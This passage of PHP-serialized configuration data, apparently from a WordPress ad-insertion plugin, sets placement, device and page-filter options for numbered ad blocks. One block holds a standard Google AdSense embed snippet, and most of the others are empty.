[]).push({});\r\n</script>\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_amp\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:7:\"Block 3\";s:8:\"tracking\";s:1:\"0\";s:12:\"display_type\";s:1:\"4\";s:16:\"paragraph_number\";s:1:\"1\";s:14:\"min_paragraphs\";s:0:\"\";s:15:\"min_words_above\";s:0:\"\";s:9:\"min_words\";s:0:\"\";s:9:\"max_words\";s:0:\"\";s:19:\"min_paragraph_words\";s:0:\"\";s:19:\"max_paragraph_words\";s:0:\"\";s:23:\"count_inside_blockquote\";s:1:\"0\";s:14:\"paragraph_tags\";s:1:\"p\";s:22:\"avoid_paragraphs_above\";s:0:\"\";s:22:\"avoid_paragraphs_below\";s:0:\"\";s:16:\"avoid_text_above\";s:0:\"\";s:16:\"avoid_text_below\";s:0:\"\";s:12:\"avoid_action\";s:21:\"try to shift position\";s:15:\"avoid_try_limit\";s:1:\"1\";s:15:\"avoid_direction\";s:20:\"below and then above\";s:14:\"excerpt_number\";s:0:\"\";s:11:\"filter_type\";i:0;s:15:\"inverted_filter\";s:1:\"0\";s:14:\"direction_type\";s:8:\"From Top\";s:14:\"alignment_type\";i:0;s:11:\"general_tag\";s:0:\"\";s:10:\"scheduling\";i:0;s:10:\"after_days\";s:0:\"\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"fallback\";s:0:\"\";s:16:\"adb-block-action\";i:0;s:21:\"adb-block-replacement\";s:0:\"\";s:18:\"maximum_insertions\";s:0:\"\";s:7:\"id_list\";s:0:\"\";s:12:\"id_list_type\";s:10:\"Black List\";s:8:\"url_list\";s:0:\"\";s:13:\"url_list_type\";s:10:\"Black List\";s:18:\"url_parameter_list\";s:0:\"\";s:23:\"url_parameter_list_type\";s:10:\"Black List\";s:11:\"domain_list\";s:0:\"\";s:16:\"domain_list_type\";s:10:\"Black List\";s:15:\"ip_address_list\";s:0:\"\";s:20:\"ip_address_list_type\";s:10:\"Black List\";s:12:\"country_list\";s:0:\"\";s:17:\"country_list_type\";s:10:\"Black List\";s:13:\"category_list\";s:0:\"\";s:18:\"category_list_type\";s:10:\"Black List\";s:8:\"tag_list\";s:0:\"\";s:13:\"tag_list_type\";s:10:\"Black List\";s:13:\"taxonomy_list\";s:0:\"\";s:18:\"taxonomy_list_type\";s:10:\"Black List\";s:16:\"display_on_posts\";s:1:\"1\";s:16:\"display_on_pages\";s:1:\"1\";s:19:\"display_on_homepage\";s:1:\"0\";s:25:\"display_on_category_pages\";s:1:\"0\";s:23:\"display_on_search_pages\";s:1:\"0\";s:24:\"display_on_archive_pages\";s:1:\"0\";s:11:\"enable_ajax\";s:1:\"1\";s:11:\"enable_feed\";s:1:\"0\";s:22:\"enabled_on_which_pages\";i:0;s:22:\"enabled_on_which_posts\";i:0;s:15:\"enable_php_call\";s:1:\"0\";s:13:\"enable_widget\";s:1:\"1\";s:14:\"paragraph_text\";s:0:\"\";s:19:\"paragraph_text_type\";s:14:\"do not contain\";s:10:\"custom_css\";s:0:\"\";s:17:\"display_for_users\";s:9:\"all users\";s:18:\"detect_client_side\";s:1:\"0\";s:17:\"detect_viewport_1\";s:1:\"0\";s:17:\"detect_viewport_2\";s:1:\"0\";s:17:\"detect_viewport_3\";s:1:\"0\";}i:4;a:78:{s:4:\"code\";s:329:\"\r\n<script async src=\"//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js\"></script>\r\n<ins class=\"adsbygoogle\"\r\n     style=\"display:block\"\r\n     data-ad-client=\"ca-pub-2121528995419082\"\r\n     data-ad-slot=\"8029362605\"\r\n     data-ad-format=\"auto\"></ins>\r\n<script>\r\n(adsbygoogle = window.adsbygoogle || []).push({});\r\n</script>\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_amp\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:7:\"Block 4\";s:8:\"tracking\";s:1:\"0\";s:12:\"display_type\";s:1:\"2\";s:16:\"paragraph_number\";s:1:\"1\";s:14:\"min_paragraphs\";s:0:\"\";s:15:\"min_words_above\";s:0:\"\";s:9:\"min_words\";s:0:\"\";s:9:\"max_words\";s:0:\"\";s:19:\"min_paragraph_words\";s:0:\"\";s:19:\"max_paragraph_words\";s:0:\"\";s:23:\"count_inside_blockquote\";s:1:\"0\";s:14:\"paragraph_tags\";s:1:\"p\";s:22:\"avoid_paragraphs_above\";s:0:\"\";s:22:\"avoid_paragraphs_below\";s:0:\"\";s:16:\"avoid_text_above\";s:0:\"\";s:16:\"avoid_text_below\";s:0:\"\";s:12:\"avoid_action\";s:21:\"try to shift position\";s:15:\"avoid_try_limit\";s:1:\"1\";s:15:\"avoid_direction\";s:20:\"below and then above\";s:14:\"excerpt_number\";s:0:\"\";s:11:\"filter_type\";i:0;s:15:\"inverted_filter\";s:1:\"0\";s:14:\"direction_type\";s:8:\"From Top\";s:14:\"alignment_type\";i:0;s:11:\"general_tag\";s:0:\"\";s:10:\"scheduling\";i:0;s:10:\"after_days\";s:0:\"\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"fallback\";s:0:\"\";s:16:\"adb-block-action\";i:0;s:21:\"adb-block-replacement\";s:0:\"\";s:18:\"maximum_insertions\";s:0:\"\";s:7:\"id_list\";s:0:\"\";s:12:\"id_list_type\";s:10:\"Black List\";s:8:\"url_list\";s:0:\"\";s:13:\"url_list_type\";s:10:\"Black List\";s:18:\"url_parameter_list\";s:0:\"\";s:23:\"url_parameter_list_type\";s:10:\"Black List\";s:11:\"domain_list\";s:0:\"\";s:16:\"domain_list_type\";s:10:\"Black List\";s:15:\"ip_address_list\";s:0:\"\";s:20:\"ip_address_list_type\";s:10:\"Black List\";s:12:\"country_list\";s:0:\"\";s:17:\"country_list_type\";s:10:\"Black List\";s:13:\"category_list\";s:0:\"\";s:18:\"category_list_type\";s:10:\"Black List\";s:8:\"tag_list\";s:0:\"\";s:13:\"tag_list_type\";s:10:\"Black List\";s:13:\"taxonomy_list\";s:0:\"\";s:18:\"taxonomy_list_type\";s:10:\"Black List\";s:16:\"display_on_posts\";s:1:\"1\";s:16:\"display_on_pages\";s:1:\"1\";s:19:\"display_on_homepage\";s:1:\"1\";s:25:\"display_on_category_pages\";s:1:\"0\";s:23:\"display_on_search_pages\";s:1:\"0\";s:24:\"display_on_archive_pages\";s:1:\"0\";s:11:\"enable_ajax\";s:1:\"1\";s:11:\"enable_feed\";s:1:\"0\";s:22:\"enabled_on_which_pages\";i:0;s:22:\"enabled_on_which_posts\";i:0;s:15:\"enable_php_call\";s:1:\"0\";s:13:\"enable_widget\";s:1:\"1\";s:14:\"paragraph_text\";s:0:\"\";s:19:\"paragraph_text_type\";s:14:\"do not contain\";s:10:\"custom_css\";s:0:\"\";s:17:\"display_for_users\";s:9:\"all users\";s:18:\"detect_client_side\";s:1:\"0\";s:17:\"detect_viewport_1\";s:1:\"0\";s:17:\"detect_viewport_2\";s:1:\"0\";s:17:\"detect_viewport_3\";s:1:\"0\";}i:5;a:78:{s:4:\"code\";s:0:\"\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_amp\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:7:\"Block 5\";s:8:\"tracking\";s:1:\"0\";s:12:\"display_type\";i:0;s:16:\"paragraph_number\";s:1:\"1\";s:14:\"min_paragraphs\";s:0:\"\";s:15:\"min_words_above\";s:0:\"\";s:9:\"min_words\";s:0:\"\";s:9:\"max_words\";s:0:\"\";s:19:\"min_paragraph_words\";s:0:\"\";s:19:\"max_paragraph_words\";s:0:\"\";s:23:\"count_inside_blockquote\";s:1:\"0\";s:14:\"paragraph_tags\";s:1:\"p\";s:22:\"avoid_paragraphs_above\";s:0:\"\";s:22:\"avoid_paragraphs_below\";s:0:\"\";s:16:\"avoid_text_above\";s:0:\"\";s:16:\"avoid_text_below\";s:0:\"\";s:12:\"avoid_action\";s:21:\"try to shift position\";s:15:\"avoid_try_limit\";s:1:\"1\";s:15:\"avoid_direction\";s:20:\"below and then above\";s:14:\"excerpt_number\";s:0:\"\";s:11:\"filter_type\";i:0;s:15:\"inverted_filter\";s:1:\"0\";s:14:\"direction_type\";s:8:\"From Top\";s:14:\"alignment_type\";i:0;s:11:\"general_tag\";s:0:\"\";s:10:\"scheduling\";i:0;s:10:\"after_days\";s:0:\"\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"fallback\";s:0:\"\";s:16:\"adb-block-action\";i:0;s:21:\"adb-block-replacement\";s:0:\"\";s:18:\"maximum_insertions\";s:0:\"\";s:7:\"id_list\";s:0:\"\";s:12:\"id_list_type\";s:10:\"Black List\";s:8:\"url_list\";s:0:\"\";s:13:\"url_list_type\";s:10:\"Black List\";s:18:\"url_parameter_list\";s:0:\"\";s:23:\"url_parameter_list_type\";s:10:\"Black List\";s:11:\"domain_list\";s:0:\"\";s:16:\"domain_list_type\";s:10:\"Black List\";s:15:\"ip_address_list\";s:0:\"\";s:20:\"ip_address_list_type\";s:10:\"Black List\";s:12:\"country_list\";s:0:\"\";s:17:\"country_list_type\";s:10:\"Black List\";s:13:\"category_list\";s:0:\"\";s:18:\"category_list_type\";s:10:\"Black List\";s:8:\"tag_list\";s:0:\"\";s:13:\"tag_list_type\";s:10:\"Black List\";s:13:\"taxonomy_list\";s:0:\"\";s:18:\"taxonomy_list_type\";s:10:\"Black List\";s:16:\"display_on_posts\";s:1:\"1\";s:16:\"display_on_pages\";s:1:\"0\";s:19:\"display_on_homepage\";s:1:\"0\";s:25:\"display_on_category_pages\";s:1:\"0\";s:23:\"display_on_search_pages\";s:1:\"0\";s:24:\"display_on_archive_pages\";s:1:\"0\";s:11:\"enable_ajax\";s:1:\"1\";s:11:\"enable_feed\";s:1:\"0\";s:22:\"enabled_on_which_pages\";i:0;s:22:\"enabled_on_which_posts\";i:0;s:15:\"enable_php_call\";s:1:\"0\";s:13:\"enable_widget\";s:1:\"1\";s:14:\"paragraph_text\";s:0:\"\";s:19:\"paragraph_text_type\";s:14:\"do not contain\";s:10:\"custom_css\";s:0:\"\";s:17:\"display_for_users\";s:9:\"all users\";s:18:\"detect_client_side\";s:1:\"0\";s:17:\"detect_viewport_1\";s:1:\"0\";s:17:\"detect_viewport_2\";s:1:\"0\";s:17:\"detect_viewport_3\";s:1:\"0\";}i:6;a:78:{s:4:\"code\";s:0:\"\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_amp\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:7:\"Block 6\";s:8:\"tracking\";s:1:\"0\";s:12:\"display_type\";i:0;s:16:\"paragraph_number\";s:1:\"1\";s:14:\"min_paragraphs\";s:0:\"\";s:15:\"min_words_above\";s:0:\"\";s:9:\"min_words\";s:0:\"\";s:9:\"max_words\";s:0:\"\";s:19:\"min_paragraph_words\";s:0:\"\";s:19:\"max_paragraph_words\";s:0:\"\";s:23:\"count_inside_blockquote\";s:1:\"0\";s:14:\"paragraph_tags\";s:1:\"p\";s:22:\"avoid_paragraphs_above\";s:0:\"\";s:22:\"avoid_paragraphs_below\";s:0:\"\";s:16:\"avoid_text_above\";s:0:\"\";s:16:\"avoid_text_below\";s:0:\"\";s:12:\"avoid_action\";s:21:\"try to shift position\";s:15:\"avoid_try_limit\";s:1:\"1\";s:15:\"avoid_direction\";s:20:\"below and then above\";s:14:\"excerpt_number\";s:0:\"\";s:11:\"filter_type\";i:0;s:15:\"inverted_filter\";s:1:\"0\";s:14:\"direction_type\";s:8:\"From Top\";s:14:\"alignment_type\";i:0;s:11:\"general_tag\";s:0:\"\";s:10:\"scheduling\";i:0;s:10:\"after_days\";s:0:\"\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"fallback\";s:0:\"\";s:16:\"adb-block-action\";i:0;s:21:\"adb-block-replacement\";s:0:\"\";s:18:\"maximum_insertions\";s:0:\"\";s:7:\"id_list\";s:0:\"\";s:12:\"id_list_type\";s:10:\"Black List\";s:8:\"url_list\";s:0:\"\";s:13:\"url_list_type\";s:10:\"Black List\";s:18:\"url_parameter_list\";s:0:\"\";s:23:\"url_parameter_list_type\";s:10:\"Black List\";s:11:\"domain_list\";s:0:\"\";s:16:\"domain_list_type\";s:10:\"Black List\";s:15:\"ip_address_list\";s:0:\"\";s:20:\"ip_address_list_type\";s:10:\"Black List\";s:12:\"country_list\";s:0:\"\";s:17:\"country_list_type\";s:10:\"Black List\";s:13:\"category_list\";s:0:\"\";s:18:\"category_list_type\";s:10:\"Black List\";s:8:\"tag_list\";s:0:\"\";s:13:\"tag_list_type\";s:10:\"Black List\";s:13:\"taxonomy_list\";s:0:\"\";s:18:\"taxonomy_list_type\";s:10:\"Black List\";s:16:\"display_on_posts\";s:1:\"1\";s:16:\"display_on_pages\";s:1:\"0\";s:19:\"display_on_homepage\";s:1:\"0\";s:25:\"display_on_category_pages\";s:1:\"0\";s:23:\"display_on_search_pages\";s:1:\"0\";s:24:\"display_on_archive_pages\";s:1:\"0\";s:11:\"enable_ajax\";s:1:\"1\";s:11:\"enable_feed\";s:1:\"0\";s:22:\"enabled_on_which_pages\";i:0;s:22:\"enabled_on_which_posts\";i:0;s:15:\"enable_php_call\";s:1:\"0\";s:13:\"enable_widget\";s:1:\"1\";s:14:\"paragraph_text\";s:0:\"\";s:19:\"paragraph_text_type\";s:14:\"do not contain\";s:10:\"custom_css\";s:0:\"\";s:17:\"display_for_users\";s:9:\"all users\";s:18:\"detect_client_side\";s:1:\"0\";s:17:\"detect_viewport_1\";s:1:\"0\";s:17:\"detect_viewport_2\";s:1:\"0\";s:17:\"detect_viewport_3\";s:1:\"0\";}i:7;a:78:{s:4:\"code\";s:0:\"\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_amp\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:7:\"Block 7\";s:8:\"tracking\";s:1:\"0\";s:12:\"display_type\";i:0;s:16:\"paragraph_number\";s:1:\"1\";s:14:\"min_paragraphs\";s:0:\"\";s:15:\"min_words_above\";s:0:\"\";s:9:\"min_words\";s:0:\"\";s:9:\"max_words\";s:0:\"\";s:19:\"min_paragraph_words\";s:0:\"\";s:19:\"max_paragraph_words\";s:0:\"\";s:23:\"count_inside_blockquote\";s:1:\"0\";s:14:\"paragraph_tags\";s:1:\"p\";s:22:\"avoid_paragraphs_above\";s:0:\"\";s:22:\"avoid_paragraphs_below\";s:0:\"\";s:16:\"avoid_text_above\";s:0:\"\";s:16:\"avoid_text_below\";s:0:\"\";s:12:\"avoid_action\";s:21:\"try to shift position\";s:15:\"avoid_try_limit\";s:1:\"1\";s:15:\"avoid_direction\";s:20:\"below and then above\";s:14:\"excerpt_number\";s:0:\"\";s:11:\"filter_type\";i:0;s:15:\"inverted_filter\";s:1:\"0\";s:14:\"direction_type\";s:8:\"From Top\";s:14:\"alignment_type\";i:0;s:11:\"general_tag\";s:0:\"\";s:10:\"scheduling\";i:0;s:10:\"after_days\";s:0:\"\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"fallback\";s:0:\"\";s:16:\"adb-block-action\";i:0;s:21:\"adb-block-replacement\";s:0:\"\";s:18:\"maximum_insertions\";s:0:\"\";s:7:\"id_list\";s:0:\"\";s:12:\"id_list_type\";s:10:\"Black List\";s:8:\"url_list\";s:0:\"\";s:13:\"url_list_type\";s:10:\"Black List\";s:18:\"url_parameter_list\";s:0:\"\";s:23:\"url_parameter_list_type\";s:10:\"Black List\";s:11:\"domain_list\";s:0:\"\";s:16:\"domain_list_type\";s:10:\"Black List\";s:15:\"ip_address_list\";s:0:\"\";s:20:\"ip_address_list_type\";s:10:\"Black List\";s:12:\"country_list\";s:0:\"\";s:17:\"country_list_type\";s:10:\"Black List\";s:13:\"category_list\";s:0:\"\";s:18:\"category_list_type\";s:10:\"Black List\";s:8:\"tag_list\";s:0:\"\";s:13:\"tag_list_type\";s:10:\"Black List\";s:13:\"taxonomy_list\";s:0:\"\";s:18:\"taxonomy_list_type\";s:10:\"Black List\";s:16:\"display_on_posts\";s:1:\"1\";s:16:\"display_on_pages\";s:1:\"0\";s:19:\"display_on_homepage\";s:1:\"0\";s:25:\"display_on_category_pages\";s:1:\"0\";s:23:\"display_on_search_pages\";s:1:\"0\";s:24:\"display_on_archive_pages\";s:1:\"0\";s:11:\"enable_ajax\";s:1:\"1\";s:11:\"enable_feed\";s:1:\"0\";s:22:\"enabled_on_which_pages\";i:0;s:22:\"enabled_on_which_posts\";i:0;s:15:\"enable_php_call\";s:1:\"0\";s:13:\"enable_widget\";s:1:\"1\";s:14:\"paragraph_text\";s:0:\"\";s:19:\"paragraph_text_type\";s:14:\"do not contain\";s:10:\"custom_css\";s:0:\"\";s:17:\"display_for_users\";s:9:\"all users\";s:18:\"detect_client_side\";s:1:\"0\";s:17:\"detect_viewport_1\";s:1:\"0\";s:17:\"detect_viewport_2\";s:1:\"0\";s:17:\"detect_viewport_3\";s:1:\"0\";}i:8;a:78:{s:4:\"code\";s:0:\"\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_amp\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:7:\"Block 8\";s:8:\"tracking\";s:1:\"0\";s:12:\"display_type\";i:0;s:16:\"paragraph_number\";s:1:\"1\";s:14:\"min_paragraphs\";s:0:\"\";s:15:\"min_words_above\";s:0:\"\";s:9:\"min_words\";s:0:\"\";s:9:\"max_words\";s:0:\"\";s:19:\"min_paragraph_words\";s:0:\"\";s:19:\"max_paragraph_words\";s:0:\"\";s:23:\"count_inside_blockquote\";s:1:\"0\";s:14:\"paragraph_tags\";s:1:\"p\";s:22:\"avoid_paragraphs_above\";s:0:\"\";s:22:\"avoid_paragraphs_below\";s:0:\"\";s:16:\"avoid_text_above\";s:0:\"\";s:16:\"avoid_text_below\";s:0:\"\";s:12:\"avoid_action\";s:21:\"try to shift position\";s:15:\"avoid_try_limit\";s:1:\"1\";s:15:\"avoid_direction\";s:20:\"below and then above\";s:14:\"excerpt_number\";s:0:\"\";s:11:\"filter_type\";i:0;s:15:\"inverted_filter\";s:1:\"0\";s:14:\"direction_type\";s:8:\"From Top\";s:14:\"alignment_type\";i:0;s:11:\"general_tag\";s:0:\"\";s:10:\"scheduling\";i:0;s:10:\"after_days\";s:0:\"\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"fallback\";s:0:\"\";s:16:\"adb-block-action\";i:0;s:21:\"adb-block-replacement\";s:0:\"\";s:18:\"maximum_insertions\";s:0:\"\";s:7:\"id_list\";s:0:\"\";s:12:\"id_list_type\";s:10:\"Black List\";s:8:\"url_list\";s:0:\"\";s:13:\"url_list_type\";s:10:\"Black List\";s:18:\"url_parameter_list\";s:0:\"\";s:23:\"url_parameter_list_type\";s:10:\"Black List\";s:11:\"domain_list\";s:0:\"\";s:16:\"domain_list_type\";s:10:\"Black List\";s:15:\"ip_address_list\";s:0:\"\";s:20:\"ip_address_list_type\";s:10:\"Black List\";s:12:\"country_list\";s:0:\"\";s:17:\"country_list_type\";s:10:\"Black List\";s:13:\"category_list\";s:0:\"\";s:18:\"category_list_type\";s:10:\"Black List\";s:8:\"tag_list\";s:0:\"\";s:13:\"tag_list_type\";s:10:\"Black List\";s:13:\"taxonomy_list\";s:0:\"\";s:18:\"taxonomy_list_type\";s:10:\"Black List\";s:16:\"display_on_posts\";s:1:\"1\";s:16:\"display_on_pages\";s:1:\"0\";s:19:\"display_on_homepage\";s:1:\"0\";s:25:\"display_on_category_pages\";s:1:\"0\";s:23:\"display_on_search_pages\";s:1:\"0\";s:24:\"display_on_archive_pages\";s:1:\"0\";s:11:\"enable_ajax\";s:1:\"1\";s:11:\"enable_feed\";s:1:\"0\";s:22:\"enabled_on_which_pages\";i:0;s:22:\"enabled_on_which_posts\";i:0;s:15:\"enable_php_call\";s:1:\"0\";s:13:\"enable_widget\";s:1:\"1\";s:14:\"paragraph_text\";s:0:\"\";s:19:\"paragraph_text_type\";s:14:\"do not contain\";s:10:\"custom_css\";s:0:\"\";s:17:\"display_for_users\";s:9:\"all users\";s:18:\"detect_client_side\";s:1:\"0\";s:17:\"detect_viewport_1\";s:1:\"0\";s:17:\"detect_viewport_2\";s:1:\"0\";s:17:\"detect_viewport_3\";s:1:\"0\";}i:9;a:78:{s:4:\"code\";s:0:\"\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_amp\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:7:\"Block 9\";s:8:\"tracking\";s:1:\"0\";s:12:\"display_type\";i:0;s:16:\"paragraph_number\";s:1:\"1\";s:14:\"min_paragraphs\";s:0:\"\";s:15:\"min_words_above\";s:0:\"\";s:9:\"min_words\";s:0:\"\";s:9:\"max_words\";s:0:\"\";s:19:\"min_paragraph_words\";s:0:\"\";s:19:\"max_paragraph_words\";s:0:\"\";s:23:\"count_inside_blockquote\";s:1:\"0\";s:14:\"paragraph_tags\";s:1:\"p\";s:22:\"avoid_paragraphs_above\";s:0:\"\";s:22:\"avoid_paragraphs_below\";s:0:\"\";s:16:\"avoid_text_above\";s:0:\"\";s:16:\"avoid_text_below\";s:0:\"\";s:12:\"avoid_action\";s:21:\"try to shift position\";s:15:\"avoid_try_limit\";s:1:\"1\";s:15:\"avoid_direction\";s:20:\"below and then above\";s:14:\"excerpt_number\";s:0:\"\";s:11:\"filter_type\";i:0;s:15:\"inverted_filter\";s:1:\"0\";s:14:\"direction_type\";s:8:\"From Top\";s:14:\"alignment_type\";i:0;s:11:\"general_tag\";s:0:\"\";s:10:\"scheduling\";i:0;s:10:\"after_days\";s:0:\"\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"fallback\";s:0:\"\";s:16:\"adb-block-action\";i:0;s:21:\"adb-block-replacement\";s:0:\"\";s:18:\"maximum_insertions\";s:0:\"\";s:7:\"id_list\";s:0:\"\";s:12:\"id_list_type\";s:10:\"Black List\";s:8:\"url_list\";s:0:\"\";s:13:\"url_list_type\";s:10:\"Black List\";s:18:\"url_parameter_list\";s:0:\"\";s:23:\"url_parameter_list_type\";s:10:\"Black List\";s:11:\"domain_list\";s:0:\"\";s:16:\"domain_list_type\";s:10:\"Black List\";s:15:\"ip_address_list\";s:0:\"\";s:20:\"ip_address_list_type\";s:10:\"Black List\";s:12:\"country_list\";s:0:\"\";s:17:\"country_list_type\";s:10:\"Black List\";s:13:\"category_list\";s:0:\"\";s:18:\"category_list_type\";s:10:\"Black List\";s:8:\"tag_list\";s:0:\"\";s:13:\"tag_list_type\";s:10:\"Black List\";s:13:\"taxonomy_list\";s:0:\"\";s:18:\"taxonomy_list_type\";s:10:\"Black List\";s:16:\"display_on_posts\";s:1:\"1\";s:16:\"display_on_pages\";s:1:\"0\";s:19:\"display_on_homepage\";s:1:\"0\";s:25:\"display_on_category_pages\";s:1:\"0\";s:23:\"display_on_search_pages\";s:1:\"0\";s:24:\"display_on_archive_pages\";s:1:\"0\";s:11:\"enable_ajax\";s:1:\"1\";s:11:\"enable_feed\";s:1:\"0\";s:22:\"enabled_on_which_pages\";i:0;s:22:\"enabled_on_which_posts\";i:0;s:15:\"enable_php_call\";s:1:\"0\";s:13:\"enable_widget\";s:1:\"1\";s:14:\"paragraph_text\";s:0:\"\";s:19:\"paragraph_text_type\";s:14:\"do not contain\";s:10:\"custom_css\";s:0:\"\";s:17:\"display_for_users\";s:9:\"all users\";s:18:\"detect_client_side\";s:1:\"0\";s:17:\"detect_viewport_1\";s:1:\"0\";s:17:\"detect_viewport_2\";s:1:\"0\";s:17:\"detect_viewport_3\";s:1:\"0\";}i:10;a:78:{s:4:\"code\";s:0:\"\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_amp\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:8:\"Block 10\";s:8:\"tracking\";s:1:\"0\";s:12:\"display_type\";i:0;s:16:\"paragraph_number\";s:1:\"1\";s:14:\"min_paragraphs\";s:0:\"\";s:15:\"min_words_above\";s:0:\"\";s:9:\"min_words\";s:0:\"\";s:9:\"max_words\";s:0:\"\";s:19:\"min_paragraph_words\";s:0:\"\";s:19:\"max_paragraph_words\";s:0:\"\";s:23:\"count_inside_blockquote\";s:1:\"0\";s:14:\"paragraph_tags\";s:1:\"p\";s:22:\"avoid_paragraphs_above\";s:0:\"\";s:22:\"avoid_paragraphs_below\";s:0:\"\";s:16:\"avoid_text_above\";s:0:\"\";s:16:\"avoid_text_below\";s:0:\"\";s:12:\"avoid_action\";s:21:\"try to shift position\";s:15:\"avoid_try_limit\";s:1:\"1\";s:15:\"avoid_direction\";s:20:\"below and then above\";s:14:\"excerpt_number\";s:0:\"\";s:11:\"filter_type\";i:0;s:15:\"inverted_filter\";s:1:\"0\";s:14:\"direction_type\";s:8:\"From Top\";s:14:\"alignment_type\";i:0;s:11:\"general_tag\";s:0:\"\";s:10:\"scheduling\";i:0;s:10:\"after_days\";s:0:\"\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"fallback\";s:0:\"\";s:16:\"adb-block-action\";i:0;s:21:\"adb-block-replacement\";s:0:\"\";s:18:\"maximum_insertions\";s:0:\"\";s:7:\"id_list\";s:0:\"\";s:12:\"id_list_type\";s:10:\"Black List\";s:8:\"url_list\";s:0:\"\";s:13:\"url_list_type\";s:10:\"Black List\";s:18:\"url_parameter_list\";s:0:\"\";s:23:\"url_parameter_list_type\";s:10:\"Black List\";s:11:\"domain_list\";s:0:\"\";s:16:\"domain_list_type\";s:10:\"Black List\";s:15:\"ip_address_list\";s:0:\"\";s:20:\"ip_address_list_type\";s:10:\"Black List\";s:12:\"country_list\";s:0:\"\";s:17:\"country_list_type\";s:10:\"Black List\";s:13:\"category_list\";s:0:\"\";s:18:\"category_list_type\";s:10:\"Black List\";s:8:\"tag_list\";s:0:\"\";s:13:\"tag_list_type\";s:10:\"Black List\";s:13:\"taxonomy_list\";s:0:\"\";s:18:\"taxonomy_list_type\";s:10:\"Black List\";s:16:\"display_on_posts\";s:1:\"1\";s:16:\"display_on_pages\";s:1:\"0\";s:19:\"display_on_homepage\";s:1:\"0\";s:25:\"display_on_category_pages\";s:1:\"0\";s:23:\"display_on_search_pages\";s:1:\"0\";s:24:\"display_on_archive_pages\";s:1:\"0\";s:11:\"enable_ajax\";s:1:\"1\";s:11:\"enable_feed\";s:1:\"0\";s:22:\"enabled_on_which_pages\";i:0;s:22:\"enabled_on_which_posts\";i:0;s:15:\"enable_php_call\";s:1:\"0\";s:13:\"enable_widget\";s:1:\"1\";s:14:\"paragraph_text\";s:0:\"\";s:19:\"paragraph_text_type\";s:14:\"do not contain\";s:10:\"custom_css\";s:0:\"\";s:17:\"display_for_users\";s:9:\"all users\";s:18:\"detect_client_side\";s:1:\"0\";s:17:\"detect_viewport_1\";s:1:\"0\";s:17:\"detect_viewport_2\";s:1:\"0\";s:17:\"detect_viewport_3\";s:1:\"0\";}i:11;a:78:{s:4:\"code\";s:0:\"\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_amp\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:8:\"Block 11\";s:8:\"tracking\";s:1:\"0\";s:12:\"display_type\";i:0;s:16:\"paragraph_number\";s:1:\"1\";s:14:\"min_paragraphs\";s:0:\"\";s:15:\"min_words_above\";s:0:\"\";s:9:\"min_words\";s:0:\"\";s:9:\"max_words\";s:0:\"\";s:19:\"min_paragraph_words\";s:0:\"\";s:19:\"max_paragraph_words\";s:0:\"\";s:23:\"count_inside_blockquote\";s:1:\"0\";s:14:\"paragraph_tags\";s:1:\"p\";s:22:\"avoid_paragraphs_above\";s:0:\"\";s:22:\"avoid_paragraphs_below\";s:0:\"\";s:16:\"avoid_text_above\";s:0:\"\";s:16:\"avoid_text_below\";s:0:\"\";s:12:\"avoid_action\";s:21:\"try to shift position\";s:15:\"avoid_try_limit\";s:1:\"1\";s:15:\"avoid_direction\";s:20:\"below and then above\";s:14:\"excerpt_number\";s:0:\"\";s:11:\"filter_type\";i:0;s:15:\"inverted_filter\";s:1:\"0\";s:14:\"direction_type\";s:8:\"From 